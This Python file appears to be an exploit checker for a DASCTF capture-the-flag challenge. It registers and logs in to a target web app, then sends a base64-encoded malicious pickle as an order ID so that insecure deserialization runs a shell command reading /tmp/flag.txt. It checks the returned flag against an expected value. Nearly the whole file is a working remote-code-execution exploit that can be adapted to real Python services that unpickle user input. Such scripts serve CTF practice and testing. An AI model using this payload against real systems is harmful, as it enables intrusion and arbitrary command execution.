#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, requests, pickle, base64, subprocess

HOST, PORT, FLAG = sys.argv[1:4]

class RCE:
    def __reduce__(self):
        import subprocess
        return subprocess.check_output, (["cat", "/tmp/flag.txt"],)

def exp(ip, port):
    url = f"http://{ip}:{port}"
    
    s = requests.Session()
    
    s.post(f"{url}/register", data={"username": "exploit", "password": "exploit"})
    s.post(f"{url}/login", data={"username": "exploit", "password": "exploit"})
    
    malicious_order = {'amount': '100', 'user': RCE()}
    payload = pickle.dumps(malicious_order)
    order_id = base64.b64encode(payload).decode()
    
    response = s.get(f"{url}/view_order", params={"order_id": order_id})
    
    flag_match = re.findall(r'DASCTF\{(.*?)\}', response.text)
    if flag_match:
        return f"DASCTF{{{flag_match[0]}}}"
    return None

if __name__ == '__main__':
    result = exp(HOST, PORT)
    print(f"Extracted flag: {result}")
    print(f"Expected flag: {FLAG}")
    assert result == FLAG
    print("Pass!")